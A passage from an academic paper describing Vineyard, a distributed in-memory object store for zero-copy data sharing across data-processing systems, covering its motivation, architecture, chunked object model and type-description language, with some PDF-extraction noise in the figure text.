can reach up to several orders of magnitudes [47, 53].\nThus, a more widely-adopted solution to handling complex data analytics is multi-system ,\nwhere users employ multiple workload-specific systems to handle different types of workloads. To\nexchange intermediate results between these systems, filesin standard formats ( e.g.,CSV and ORC)\non external storage ( e.g.,HDFS [ 57], Amazon S3 [ 10], and Alluxio [ 40]) are commonly used, as\nshown in Figure 1. In this way, different systems can be nicely bridged, but the cost of data sharing\nacross systems becomes higher than that in single-system (e.g.,Spark). The root cause is that the\ninterfaces for files ( i.e.,read and write) are primitive and unstructured. Hence, dumping/loading\ndata as files can incur unnecessary copying, (de)serializations and/or I/Os. Moreover, instances of\nhigh-level data structures ( i.e.,objects) lose their rich semantics and behaviors when flattened to\na sequence of bytes. It requires systems to repeatedly implement their own in-memory formats\nand methods, as well as the (de)serialization logic. Such loss of semantics also makes it difficult\nto apply cross-system optimizations ( e.g.,pipelined execution and computation-data co-locating).\nTo tackle the above issues, we present Vineyard , a distributed object store for data sharing across\nworkload-specific data processing systems. We observe that various workload-specific systems\nare built on top of some common data structures ( e.g.,dataframes and graphs). Although data\nstructures of the same type often have different memory layouts and implementations in different\nsystems, their high-level interfaces keep almost the same [ 33]. This observation inspires us to\noffer customizable common memory layouts and implementations for intermediate data structures\nshared by multiple systems, and enable the efficient in-memory sharing of these data structures\nand their associated interfaces and methods among different systems written in different languages.\nIn this fashion, different systems can access objects inVineyard just like the high-level native\nobjects of their own. Vineyard supports zero-copy data sharing by decoupling an object into\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.Vineyard: Optimizing Data Sharing in Data-Intensive Analytics 200:3\nmetadata and a group of payloads, allowing users to reconstruct a complex object from memory-\nmapped payloads in different processes with metadata. Vineyard organizes large objects in chunk\ngranularity, allowing each chunk spilled to an external storage or distributed in remote hosts to\nsupport big data. Like Protobuf [ 35],Vineyard provides an IDL (intermediate description languages)\nnamed VCDL for users to define new formats to alleviate the integration burden with Vineyard .\nBesides, Vineyard is designed to be cloud-native and work robustly and efficiently in real-world\nworkflows. Vineyard is open-sourced1and under active development. It is already integrated\nor being integrated with more than a dozen data processing systems including PyTorch [ 52],\nTensorFlow [ 8], PowerGraph [ 34], GraphScope (distributed graph computation systems) [ 23] and\nMars (large-scale scientific computation engine) [45].\nContributions & organization. We make the following contributions to facilitate and speed up\ncross-system data sharing:\n(1) Motivation (§2). We analyze the current solutions for data sharing from the aspects of data\nstorage medium and data format to reveal the reasons why current solutions fail in complex\nworkflows.\n(2) System (§3). We first describe the opportunity that Vineyard tries to seize. Then we detail the\nsystem architecture of Vineyard , and its components, and discuss the challenges to achieve our\ndesign goal.\n(3) Implementation (§4). We detail the implementation of Vineyard from three aspects: (i) A dis-\ntributed in-memory object store for composable data structures ( §4.1). (ii) The VCDL IDL and\ncode generator to facilitate the type registration and integration ( §4.2). (iii) Locality awareness on\nKubernetes clusters [7] and fault tolerance in cloud environments ( §4.3).\n(4) Use cases (§5). We provide a set of Vineyard integration use cases with six data processing\nsystems, which demonstrates the integration friendliness of Vineyard .\n(5) Evaluation (§6). An extensive evaluation of Vineyard . We find the following: (i) Vineyard can\nboost the end-to-end performance by 3 ×times on average and reduce the data-sharing time by\n28.8×on average compared with its best competitors. (ii) The overhead of Vineyard is negligi-\nble, which only takes about 40 milliseconds to share hundreds of Gigabytes of objects. (iii) The\nintegration effort is low which only requires about 100 lines of changes for a system.\nLimitations and non-goals. Vineyard has a number of restrictions and non-goals. First, Vine-\nyard targets at optimizing data sharing across systems for data-intensive workflows. As for\ncomputation-dense workflows such as model training, the end-to-end performance improvement\nis quite limited since most of their execution time is devoted to computational kernels. Second,\nVineyard does not provide a global workflow optimizer and always assumes users have chosen\nan appropriate workload-specific system for each task, while some prior studies ( e.g., Muske-\nteer [ 33]) aim to map tasks to suitable back-end execution systems. Third, Vineyard aims at the\nsharing of large immutable intermediate results, while the caching of frequently updated data like\nMemcached [20] or Redis [44] is not our goal.\n2 MOTIVATION\nTo enable data sharing among different systems, diverse solutions have been proposed. Their\nfundamental differences mainly come from where the intermediate data is stored ( i.e.,storage\nmedium), and how the data is represented ( i.e.,format).\n1Vineyard is available at https://github.com/v6d-io/v6d\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.200:4 Wenyuan Yu et al.\nStorage medium. In general, existing solutions utilize either main memory orexternal storage\nto share data across systems. However, many challenging issues still exist in handling large and\ndistributed data under diverse running environments.\nMemory. Memory can be used as a medium for sharing data among different libraries and systems\non a single machine. For example, in the PyData ecosystem, libraries, such as Numpy [ 15] and\nPyTorch, can exchange a large tensor as a variable directly within a single Python process with\nzero copying. Some multi-process parallel computation systems use shared memory for exchanging\nintermediate data across processes. An object store Plasma developed for Apache Arrow [ 31] and\nRay [ 49] also allows sharing of immutable data (objects) between processes with simple PUT/GET\noperations in shared memory. Memory provides an efficient way to exchange data across systems\non a single machine avoiding unnecessary copying and/or I/Os with external storage. However,\nmemory-based solutions are difficult to scale. First, intermediate data is required to locate on a\nsingle machine and fit in the main memory, while existing solutions lack the support of distributed\nor outsized data, both are pivotal to real-life big data applications. Second, memory-based solutions\nsometimes require ad-hoc and specialized integrations between pairs of involved systems/libraries.\nExternal storage. Different from memory, external storage ( e.g.,local disks, HDFS and Amazon\nS3) often provides primitive yet unified file system-like interfaces ( e.g.,open ,read andwrite ).\nFurthermore, its capacity can be considered unlimited in cloud environments. As a result, external\nstorage-based solutions can bridge different systems without intrusive changes to the data process-\ning system itself, and are appropriate to exchange extremely large-scale data. However, compared\nwith memory-based solutions, the performance of external storage-based solutions is relatively\npoor due to the following reasons. First, intermediate data is stored as files in file systems ( e.g.,\nORC and Parquet files), while dumping/loading data as files will incur expensive copying and I/O\noverheads. Second, each system needs to access files ( i.e.,a sequence of bytes) through primitive file\ninterfaces, while high-level data structures contain rich semantics and methods ( e.g.,thefind(key)\nmethod for a hashmap). To keep rich semantics of high-level data structures, each system needs\nto build its internal data structures from a sequence of bytes, causing (de)serialization costs. For\nexample, to execute the complex job shown in Figure 1 over external storage, the costs for data\nsharing across systems take over 40%of end-to-end execution time (see §6).\nMore recently, some work, such as Alluxio and JuiceFS [ 39], tries to alleviate the high I/O cost in\nexternal storage-based solutions, by caching frequently accessed data in memory and local SSDs\nwhile keeping the less used data in external storage. Unfortunately, its interfaces are based on files,\nand still suffer from excessive data copying and (de)serialization overheads. For example, to share\nthe 200GB neuraltalk2 dataset [ 46] from Numpy to PyTorch, conducting it over Alluxio in .npy\nfiles requires 656 seconds while the cost is nearly zero with in-memory sharing within the Python\nprocess.\nFormat. To share intermediate data, systems must agree with the data format, i.e.,how the data\nshould be organized and represented. To this end, much effort has been devoted to defining some\nstandard data formats to represent commonly used data structures, such as columnar format and\nORC for table-like data, and multi-dimensional array for tensors. With these standard data formats\nin place, data processing systems only need to implement adaptors to read/write standard formats.\nHowever, there still exist some circumstances where standard data formats cannot work well.\nFirst, in many cases, there are often some differences between a standard data format and the\ninternal data structure defined in a specific system. As a result, it takes some transformation and\n(de)serialization costs for the data processing system to convert data between the standard formats\nand its internal data structures. For example, Apache Dremio [ 30] uses Apache Arrow as its internal\ncolumnar data format. When facing ORC files, it requires an extra (de)serialization process to write\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.Vineyard: Optimizing Data Sharing in Data-Intensive Analytics 200:5\ntorch /gid17Tensor \nnumpy.ndarray (a) (b) livegraph::Graph \nPayload for (v=0; v<MAXV; v++){ \n auto iter = g.get_edges(v); \n whlie (iter.valid()){ \n ... \n Update(v, iter) \n ... \n iter.next(); \n } \n}\nGraphScope::Fragment \nPayload for (v=0; v<g.vsize(); v++){ \n auto iter = g.edges(v); \n whlie (iter.has_next()){ \n ... \n Update(v, iter) \n ... \n iter++; \n } \n}Payload: Payload: \n1 Gigabytes \nMetadata: \nMetadata: .size= torch.Size( /gid62512,512 /gid15512]) \n.dtype= torch.int64 \n.shape= (512,512 /gid15512) .size= 134217728 \n.dtype= np.int64 .data= <memoryref> \n1 Gigabytes Methods: \n__getitem__(key); \nMethods: \n__getitem__(key); v0v1v2\nv0v1v2\nadj(v 0)adj(v 0)\n.data= <memoryref> \nFig. 2. The data structure commonality when (a) the layouts of tensor payloads are the same while only differ\nin metadata, (b) the layouts of graph differ between adj list and CSR, while the interfaces defined on them\nare similar.\nto (read from) ORC files even though ORC is also organized in columnar formats. Second, there\nis still a lack of standard formats for many commonly-used data structures ( e.g.,hashmaps and\ngraphs). As a result, their implementations vary a lot in different systems. Under such a situation,\nan internal data structure has to be serialized into primitive and flatdata formats. For example,\nhashmaps are usually shared as a sequence of key-value pairs, and then rebuilt from scratch by the\nreceiver. During this process, high-level data structures lost their semantics ( e.g.,key lookups for a\nhashmap), amplifying the unnecessary transformation and (de)serialization overheads.\nInsights. Based on the above analysis, an underlying framework that can make data sharing across\nsystems more efficient and flexible has to simultaneously satisfy the following requirements.\n(1) On the data medium side, it should be able to provide an efficient in-memory data-sharing\nmechanism while supporting distributed and outsized data with external storage, and minimizing\ndata copying, I/O and network overheads.\n(2) On the data format side, it should allow developers to easily define and implement new and\ncomplex data structures, and make the data format used for intermediate data consistent with the\ninternal data structures in data processing systems when possible, to avoid unnecessary overheads\nsuch as data transformation and (de)serialization.\n3 APPROACH AND CHALLENGES\nOpportunity: many intermediate data structures share some commonalities across differ-\nent systems. In general, a data structure can be conceptually broken down into payloads ,metadata\nand methods , as shown in Figure 2 (a). The main parts that hold the actual data are payloads ,\nwhich correspond to a continuous memory space ( e.g.,the 1GB buffer in Tensor ), and metadata\nprovide necessary attributes ( e.g.,.size and.dtype forTensor ) to interpret the payloads. Besides,\nmethods provide high-level and opaque interfaces ( e.g.,__getitem__(key) forTensor ) for users\nto manipulate the data. We found the data structures in diverse data processing systems do share\nsome degree of commonalities. They can be divided into the following categories:\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.200:6 Wenyuan Yu et al.\n(1)Payload commonality: The memory layouts of the payloads of the upstream and downstream\nsystems are exactly the same, but only differ in the organization of metadata in the data structure.\nFor example, DataFusion [ 28] and Polars [ 17] have payload commonality, since their underlying\ndata structures both are based on Apache Arrow. As another example, shown in Figure 2 (a), both\nPyTorch and NumPy process tensors. The layout of payload buffers of the tensor type in these\ntwo systems are exactly the same but only differ in metadata. Compared to the payload (1GB), the\nspace to keep their metadata is negligible. To leverage such commonalities for data sharing, one\ncan re-create the metadata of the shared object in another system with little overhead, as long as\nthe (de)serialization, copying and I/O over the payloads between two systems can be avoided ( e.g.,\nvia memory mapping). And such sharing is called payload sharing .\n(2)Interface commonality: The layout of payloads of data structures of upstream and downstream\nsystems differ from each other, but the provided interfaces follow the same logic and semantics.\nWe can find many interface commonalities in big-data ecology. (i) The index data structures, e.g.,\ntrees, hashmaps, or filters, can be implemented in different ways, while their exposed interfaces are\nsimilar, e.g.,exist(key) ,size() . (ii) The main abstraction of Spark is a resilient distributed dataset\n(RDD), a collection of elements partitioned across hosts of a cluster that can be operated in parallel.\nData structures that implement interfaces over RDD can be processed in Apache Spark without\nchanging the physical memory layout. (iii) GraphScope and LiveGraph [ 68] represent graphs in\ndifferent ways. However, they both provide adjacency-list-like interfaces on their data structures,\nas shown in Figure 2 (b). To leverage this kind of commonality for data sharing, one can write a\nwrapper around the methods of objects in the upstream system to provide the interfaces for the\ndownstream system, instead of a thorough conversion, and such sharing is called method sharing .\n(3) In other situations, data structures of upstream and downstream systems are totally irrelevant\nor systems do engine-specific optimizations such as manipulating the raw data. For example,\nClickHouse [ 19] and Apache Doris [ 29] enable engine-specific optimization such as vectorization\nand data compression. It is intractable to share intermediate data between them without a physical\nconversion or non-intrusive modification. This kind of conversion often requires time-consuming\ndata scans and is inevitable in this case.\nTo seize the opportunity, we propose Vineyard , an off-the-shelf distributed object store for\nefficient cross-system data sharing, exploiting both payload and interface commonalities for in-\nmemory data sharing in cloud environments. At the same time, it insulates users from cumbersome\ndata alignment boilerplate code by providing simple put() andget() APIs, allowing users to\nput objects in a system and get them back in another system without suffering the pain of I/Os,\n(de)serialization, annoying glue code, and inefficient cross-language interaction.\n3.1 System Overview\nArchitecture of Vineyard .Figure 3 depicts the architectural overview of Vineyard . Compared\nwith file system-based data-sharing solutions, Vineyard stores intermediate data as objects , and\nintroduces a novel data-sharing mechanism to achieve high performance and flexibility while\nkeeping the cost of integration as low as possible. Overall, Vineyard consists of seven modules:\nVineyard client (labeled by\n1 ).Vineyard provides a SDK supporting multiple programming\nlanguages (including C/C++, Python, Java and Rust) to integrate with data processing systems.\nWith the SDK, an object can be retrieved from Vineyard by its ID via get() , and new objects can\nbe constructed via put() for other systems to consume later. The object returned from the local\nVineyard is a language-native object ( e.g.,numpy.ndarray in Numpy) while the payloads of the\nobject are still kept in the shared memory managed by Vineyard daemon without copy. To achieve\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.Vineyard: Optimizing Data Sharing in Data-Intensive Analytics 200:7\nHost 1 …\nMetadata Service Object \nmanager Applications \nVineyard Client \nIPC \nServer RPC \nServer \nVineyard \ndaemon \nExternal storage (HDFS/S3) I/O \nConnector \nHost 2 Object \nmanager Applications \nVineyard Client \nRPC \nServer IPC \nServer \nI/O \nConnector 1\n2 3\n4\n7\nid=put(obj) \nobj=get(id) FUSE Type Registry \npull(type) 5\n6\nVineyard \ndaemon register(type) \npull(type) \nFig. 3. System Overview.\nthese, the SDK includes an IPC client to Vineyard and communicates with the Vineyard daemon on\nthe same host via the UNIX-domain socket. Besides the IPC client, the Vineyard SDK includes a\nRPC client as well to communicate with the Vineyard daemon on remote hosts via the TCP socket.\nThe RPC client is used to send requests to the Vineyard daemon on remote hosts to complete the\nrequests sent from peers such as retrieving metadata and migrating an object from/to the local\nVineyard daemon.\nIPC/RPC server (labeled by\n2 and\n3 ). An IPC server listens to the requests from the clients in the\nsame host. It then interacts with the object manager to complete the requested tasks such as object\ncreation, accessing and deletion. Requests are organized into queues and consumed asynchronously\nand concurrently. A completion reply is sent to the client when a request is done. For example, a\nclient that sends a GET_OBJECT request will receive a reply with metadata dictionary and a set of\nfile descriptors, then it can create memory-mapped blobs first and construct the object with the\nmetadata and the blobs. An RPC server listens requests from clients in remote hosts to complete\nthe requests sent from peers such as retrieving metadata and migrating an object from the remote\nVineyard daemon.\nObject manager (labeled by\n4 ). The payloads (blobs) of an object are stored in the in-memory\nVineyard object store, which lives in a Vineyard daemon process on every host, thus different\ncomputing processes running on the same host can share data through the object store. The\nobject manager takes charge of orchestrating these payloads such as allocation, movement, seal\nand deletion. Note that an object is mutable after creation and invisible to other processes until\nit is sealed. Once sealed, the object becomes immutable ,i.e.,cannot be modified anymore, and\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.200:8 Wenyuan Yu et al.\nvisible to other processes. There are two main reasons: (i) immutable objects suffice for most data\nanalytics [40]; and (ii) they reduce the complexity of concurrent data accesses.\nType registry (labeled by\n5 ). In order to support cross-system object accessing, Vineyard provides\na type registry for users to register user-defined data structures, a.k.a. how the payloads and\nmetadata constitute an object, and how to reinterpret an object. Like Protobuf, Vineyard provides\nan IDL (intermediate description languages) named VCDL (detailed in §4.2) for users to define their\ncustomized data structures. When a system tries to get/putan object from/to the object store, it\nwill lookup the registry to transform the registered type in Vineyard into its own internal type\nor vice versa. The type registry is implemented as a key-value map, with the name of the type\nas the key, and the concrete description of this type as the value. For example, the key may be\n“foo::bar::Graph::1.10.0 ”, and the value is a set of VCDL files.\nI/O connector (labeled by\n6 ). The interfaces of the I/O connector are provided to enable pluggable\nadapters, which allows Vineyard to load/store data from/to external storage such as local filesystem,\nHDFS and S3, in common formats like Parquet, ORC, HDF5 and CSV, and migrate data from remote\nVineyard daemon over networks. Built on the I/O connector, Vineyard supports to spill cold objects\nunder high memory pressure, and load from external storage back when those spilled objects been\nrequested, as well checkpoint/reload to/from external storage for fault-tolerance. In addition, cache\nand prefetch are adopted to alleviate the I/O overheads in these cases.\nMetadata service (labeled by\n7 ). Payloads of objects are stored as blobs in local shared memory\nwhile the metadata of objects are stored in a distributed, consistent key-value store ( e.g.,etcd [ 22]\nand Redis) for object resolution. Metadata is essentially key-value pairs that describe how a group\nof blobs constitute an object. The metadata service guarantees the synchronization and consistency\nof metadata across the cluster, and metadata connects correct blobs when the objects are created,\ndeleted, or migrated from a remote host. The consistency also allows Vineyard to support distributed\nobjects called “ collection ”, which is composed of objects on multiple hosts across the cluster as well\nas external storage (see details in §4.1).\nVineyard is designed to be extensible, and its functionality is divided into several loosely-coupled\nmodules for users to customize the integration. (i) Vineyard provides an IDL named VCDL to enable\nusers to register customized data structures succinctly. (ii) APIs for I/O connectors to exchange\nVineyard objects with other storage media, file formats and networking stacks. (iii) Vineyard\nalso provides useful modules to facilitate the integration. For example, Vineyard provides format\nconverters for conversions of common data formats ( e.g.,row-based tables to/from column-based\nones), and FUSE (Filesystem in userspace) drivers [ 43], to provide file system APIs to project\nVineyard objects to/from common file formats ( e.g.,Parquet, ORC and CSV). Incorporating these\nmodules in a workflow, Vineyard can liberate users from the tedious task of implementing and\nintegrating such logic with individual data processing systems.\n3.2 Challenges\nC#1: How to share complex objects efficiently . At the center of Vineyard , the way it organizes\nand serves objects is crucial to its efficacy. It is challenging and non-trivial as well. There are\nthree key criteria to meet: (i) Support big data. Many intermediate data is larger than the memory\ncapacity of a single machine or even the aggregated memory of a cluster. Vineyard should support\nlarge objects, making it able to take advantage of distributed computing and external storage. (ii)\nObject composability. Many data structures, e.g.,graphs, are complex , and composed of several\nother objects ( e.g.,arrays and hash indices are used in graphs). In addition, it is very common that\na task incrementally creates a new object from an existing one with small changes. These two\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.Vineyard: Optimizing Data Sharing in Data-Intensive Analytics 200:9\ncharacteristics require to express an object in a composable fashion. (iii) High efficiency. As we\ndiscussed, the performance of data sharing is largely affected by (de)serialization and extra memory\nmovements. The object store of Vineyard needs to be designed to minimize such costs.\nC#2: How to reduce integration effort. For cross-system data sharing, a downstream task does\nnot understand the data type of the object put by its upstream tasks, unless Vineyard provides a\nmechanism to register the type. To this end, there are three key requirements to satisfy: (i) Avoid\nintrusive integration. Vineyard should avoid hard-coding the type into the downstream task, by\nmodifying its source code or re-compilation. (ii) Serve the polyglot workflow . As a language-agnostic\nframework, Vineyard should ensure cross-language interoperability to achieve high flexibility and\nperformance in ubiquitous polyglot workloads. It is challenging even with standard FFI (Foreign\nFunction Interface), as language boundaries often add performance overheads because the cross-\nlanguage interface has to marshal foreign objects. (iii) Less boilerplate code. Vineyard needs to\ninsulate users from wrapping guest-language functions with annoying glue code by automatically\ngenerating the boilerplate code to achieve high flexibility.\nC#3: How to work in cloud-native environments. Vineyard is designed as a daemon to serve\ndiverse applications in cloud-native environments. Therefore, it is important for Vineyard to (i)\nhelp the workflow scheduler to consider data affinity when launching a new task and automatically\nprefetching the required data into memory when the downstream tasks are scheduled to a group\nof new hosts; (ii) handle exceptions such as shutdown, operation abort, and memory exhaustion\nto work robustly in production environments; and (iii) provide stable performance in a variety of\nscenarios such as burst objects pouring, and storing extremely small/large objects. The object store\nofVineyard should hide the system complexity from users and handle the above cases gracefully.\n4 DESIGN AND IMPLEMENTATIONS\nIn this section, we introduce key designs and implementations to overcome the above challenges.\n4.1 Sharing of Complex Objects Efficiently\nAs discussed in C#1 of§3.2, sharing complex objects needs to simultaneously meet the requirements\nofbig-data ,composability , and efficiency . First, we introduce the data model of Vineyard objects.\nNext, we introduce how these goals are achieved.\nData model. Vineyard objects are chunk-based, distributed, and immutable. From common practices\nof big data processing, we observed that large-scale data is often chunked and distributed processed\nin chunk-granularity. Chunk-granularity brings flexibility and efficiency, and the data model of\nVineyard aligns with such a design. More specifically, the objects in Vineyard can be divided into\nthree categories:\n(1)Blob. A blob is a big amorphous binary data structure stored as a single entity. Blobs are typically\nbuffers that consume consecutive memory. In Vineyard , blobs are basic units to constitute the\npayloads of a complex object.\n(2)Local object . A local object is a set of blobs with metadata to describe how these blobs constitute\na complex object. The metadata is a dict-like structure, with field names as keys and primitive\ntypes ( e.g.,int, double and String), blobs, or other objects as values. Values of the same type can\nbe repeated zero or more times for a given key, and their order is preserved (like Protobuf). Local\nobjects are conceptually similar to the aforementioned chunks in data processing systems. For\nexample, a local object can be a partition of a RDD in Spark [ 65], a part of a table in ClickHouse,\nor a partition of a graph in PowerGraph. “Local\" means the object can fit in the memory of the\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.200:10 Wenyuan Yu et al.\n1template <typename T>\n2class Iterator {\n3 // Get the next object in the collection .\n4 iterator next ();\n5 // Get the next local object in the collection .\n6 iterator next_local ();\n7};\n8\n9template <typename T>\n10class Collection {\n11 // Return the reference of a specific local object .\n12 iterator at(int idx );\n13 // Return the number of objects of the collection .\n14 size_t size ();\n15 // Return the iterator of the first object .\n16 iterator begin ();\n17 // Retrun the iterator of the first local object .\n18 iterator local_begin ();\n19 // Return the iterator of the past -the - end object .\n20 iterator end ();\n21};\n22\n23class CollectionBuilder {\n24 // Put the object of given id to the collection .\n25 void put ( size_t idx , ObjectID id);\n26 // Seal the collection to prevent mutation .\n27 void seal ();\n28};\nFig. 4. The APIs of Collection.\nlocal host, i.e.,once a client tries to GETa local object, Vineyard will first make sure all its blobs\npresent in the host memory before sharing them through memory mapping.\n(3)Collection . A collection is a set of local objects of the same type with metadata to describe how\nthese local objects logically constitute a global object and which hosts these local objects locate. Parts\nof a collection’s objects may be stored in external storage or on remote hosts. Vineyard provides\nAPIs for users to pick a specific local object from a collection or just iterate on all interior objects\nor local ones as shown in Figure 4.\nSupport big data scenario. To store large objects as collections in either external storage or\ndistributed memory, Vineyard provides corresponding mechanisms to move data between external\nstorage and memory or between different hosts.\nMoving blobs between external storage and memory. It is common that data cannot fit in memory in\nbig data applications for users who want to persist the data as checkpoints. (i) Vineyard provides a\nspilling mechanism that can swap some blobs from memory to external storage or remote object\nstore when memory pressure is high. The spilling process can be triggered automatically when\neither Vineyard fails to allocate new shared memory blobs or the memory usage reaches a specified\nthreshold. With I/O connectors, Vineyard can leverage various external storage systems, e.g.,local\nfilesystem, HDFS, and S3 for spilling. By default, the least recently used (LRU) policy is adopted for\nautomatic spilling. Users can keep required objects in memory during computing with the pin()\nAPI to prevent object from being spilled. Users can also rely on the auto-spilling by utilizing basic\nput() /get() APIs, or they can fully manage the spilling process to control the location of each\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.Vineyard: Optimizing Data Sharing in Data-Intensive Analytics 200:11\nblob at any time with the evict() andload() APIs to lest auto-spilling introduces unpredictable\noverheads and deliver guaranteed performance. Further, users are allowed to give hints when\ngetting Collection to indicate the expected access patterns, e.g.,for a sequential scan, the I/O\nworkers will pre-reload the spilled blobs to overlap the computation and communication and reduce\nthe I/O overhead. (ii) For checkpointing, Vineyard provides a save method for users to copy the\nentire local object or collection into external storage. A load method is provided to restore an\nobject from a checkpoint. When Vineyard clients send requests to save or load an object, the I/O\nworker will block other requests until the process completes to avoid data race conditions.\nFetching blobs from remote hosts. Since objects of a collection are scattered in multiple hosts, appli-\ncations may access a non-local object. To support such remote object accessing, the Vineyard object\nmanager first queries the location of the object in metadata service, then it requests the I/O connec-\ntor with the object identifier and the location, and finally, the I/O connector will communicate with\nthe data holder to access the object. The fetched objects will be stored in the local object manager\nand this object will be marked as local. The fetching can be triggered automatically or manually in\neither asynchronous or synchronous mode. After receiving the fetching request, the I/O connector\nwill fully handle the data movement. Since the I/O connector allows developers to integrate diverse\nnetwork libraries such as verbs for RDMA, gRPC [ 37], or DPDK [ 26], it is easy to achieve high\nperformance in diverse scenarios.\nObject composability To achieve composability, Vineyard adopts a decoupled design , where the\nmetadata ofobjects are managed separately from the payloads . The metadata of each object (identi-\nfied by an object ID) is represented as a set of key-value pairs. Taking the Collection<DataFrame>\n(a simplified dataframe) shown in Figure 5 as an example, it is represented by its unique ID “ 0001 ”,\nnames of its two member objects (“ 0012 ” and “ 0013 ”) located on different hosts, and each object\nhas two columns (namely “ UserID ” and “ ItemID ”) with two objects IDs associated with two Array\nobjects. Each Array object corresponds to a column of the dataframe, and is linked to a blob that\nrepresents the payload of the Array object. The Array objects can be accessed either independently\nor as a part of the DataFrame object or as an indirect part of the Collection<DataFrame> object.\nRecall that objects are immutable in Vineyard , to add a new column Amount to the DataFrame\nobject 0012 ,Vineyard simply create a new object “ 0014 ” to replace the old object “ 0013 ” with\nan extra column “ 0120 ” and reuse the columns “ 1005 ” and “ 1006 ”, without copying the entire\nDataFrame object, saving memory and improving performance.\nThis decoupled design brings two benefits to Vineyard : (i) referring to the same blob by different\nobjects is allowed, without worrying about data race and consistency issues since objects are\nimmutable in Vineyard , and metadata is managed separately. (ii) It is very common that a data\nanalytics job creates a new object 𝑂′from an existing object 𝑂with small changes and keeps both\n𝑂and𝑂′inVineyard for later processing. Compared with duplicating the same payloads twice,\nincrementally creating a new object 𝑂′from an existing object 𝑂with small changes is more time\nand space-efficient.\nVineyard provides out-of-the-box efficient implementation for de-facto standard data structures,\ne.g.,Vector ,HashMap ,Tensor ,DataFrame andGraph in the SDK, and integrates those data types\nwith widely-adopted data processing systems, e.g.,Numpy ,Pandas ,PyTorch . Thanks to the decou-\npled design, these data structures can be directly used as the basic building blocks when users\nattempt to construct and share more complex system-specific data structures in their applications.\nEfficiency. With the decoupled design, the overheads of creating and accessing an object in Vine-\nyard can come from two sources, namely dealing with the payloads and metadata. For most common\ndata types, the vast majority of the overheads are the payload part. For example, the DataFrame\nobjects shown in Figure 5 can represent a table with tens of billions of records in only a handful\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.200:12 Wenyuan Yu et al.\n2 41 41 32 32 1ItemID UserID [0012 , 0013 ]Collection<DataFrame> Type 0001 ID \n24.0 Amount \n139.9 \n24.9 \n64.2 58.0 \n1007 Blob Array Type ID 1006 \n 1022 Blob Array Type ID 0120 \nType ID 1007 \nBlob Size 2\nAddr 0x00a726c5 Type ID 1022 \nBlob Size 2\nAddr 0x00a726d4 Host 1 \nHost 2 [1005 , 1006 ] Cols [“UserID”, “ItemID”] Names DataFrame Type ID 0012 \nDataFrame \n[“UserID”, “ItemID”, \n“Amount”] ID \nNames Type 0014 \nCols [1005, 1006, 0120] …\n…\n0012 \n0013 Add \nColumn \nFig. 5. Object Storage and Data Sharing.\nof key-value pairs as metadata (less than 1KB) while the size of blobs is greater than tens of GBs.\nTo achieve high efficiency, the blobs are directly memory-mapped to the clients by Vineyard for\naccessing payloads with zero-copy . Generally, the payload data are managed by individual systems\nbefore handing over to Vineyard , therefore at least one copying is required to move the data into\ntheVineyard object manager for the first task in each workflow. Fortunately, it is still possible to\noptimize out such copying. Vineyard provides a special memory allocator to allow dynamic memory\nallocation directly on its shared memory pools from processes of the data processing systems. The\nmemory allocator serves as a drop-in replacement for the default malloc /free functions using\ntheLD_PRELOAD [3], if the target systems allow the replacement of their own memory allocators.\nWhen put() native objects to Vineyard , the client will skip copying the blobs that already reside\nonVineyard ’s shared memory and link metadata to the existing blobs.\n4.2 Minimize high integration effort\nIn§4.1, we have described how objects are organized in Vineyard , and explained how Vineyard\nshapes the performance with the help of object composability. However, sharing objects between\nsystems via memory mapping in real-life workflows is still intricate. (i) To exploit payload common-\nality, users have to construct from the metadata and payloads manually since there is no standard\nway to cast a type from one system to another. For example, in Figure 2 (a), users store a PyTorch\nTensor as a blob into Vineyard , then getand reinterpret it as a NumPy ndarray . Such manual\nintegration is ad-hoc and users have to write many error-prone and boilerplate codes. Worse still,\nsuch integration is not extensible: to share data between 𝑀upstream tasks and 𝑁downstream tasks,\nrepeatedly conducting 𝑀×𝑁integrations case by case can be daunting enough to deter the usage of\nVineyard for larger workflow. (ii) To exploit interface commonality, users should first introduce the\nmetadata and methods of the intermediate data structure into a downstream task, then implement\na wrapper to enable method sharing. For example in Figure 2 (b), to share a livegraph::Graph\nto GraphScope, users first need to link LiveGraph as a library dependency during building, then\nforward methods of GraphScope::Fragment likeg.edges(v) to methods of livegraph::Graph\nlikeg.get_edges(v) . Similarly, such integration is also not extensible. Enabling method sharing\nin polyglot workflows requires further effort. For example, although Griaph.GraphType (Java\nclass) and GraphScope::Fragment (C++ class) both represent graphs in their engines respectively\nand have similar interfaces, nevertheless, these systems still have gaps that need users to bridge\nmanually, i.e.,different memory management models in different programming languages. One\nway to achieve it is to re-implement the logic or implement an FFI (Foreign Function Interface)\nwrapper of the methods of GraphScope::Fragment in Java, then wrap the methods of Java-version\nGraphScope::Fragment to imitate behaviors of methods of Giraph.GraphType , which is hard to\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.Vineyard: Optimizing Data Sharing in Data-Intensive Analytics 200:13\n1// type .h\n2template <typename T>\n3[[shared ]]class Array {\n4 private :\n5 [[shared ]]Blob b;\n6 size_t len ; // non - shared property\n7 public :\n8 [[shared ]] T getItem ( size_t idx ) {...}\n9};\n10\n11template <typename T>\n12[[shared ]]class DataFrame {\n13 private :\n14 [[shared ]] Repeated < String > names ;\n15 [[shared ]] Repeated <Array <T>> cols ;\n16 public :\n17 [[shared ]] Array <T> getCol ( size_t idx ){\n18 return cols . get ( idx );\n19 }\n20};\nFig. 6. An example of VCDL.\nmaintain and optimize. Once the methods change in one version, users have to re-implement them\nagain to keep the consistency. To be more specific, the integration burden stems from the following\ntwo aspects:\n(1) No common formats for some data structures between upstream and downstream systems. With-\nout a common format, users have to manually implement low-level memory assignment case by case.\n(2) Re-implement methods for method sharing. Since upstream and downstream systems reside in\ndifferent processes (or even implemented with different languages), users require to re-implement\nthe logic of shared complex objects to enable method sharing.\nVineyard Class Description Language. To 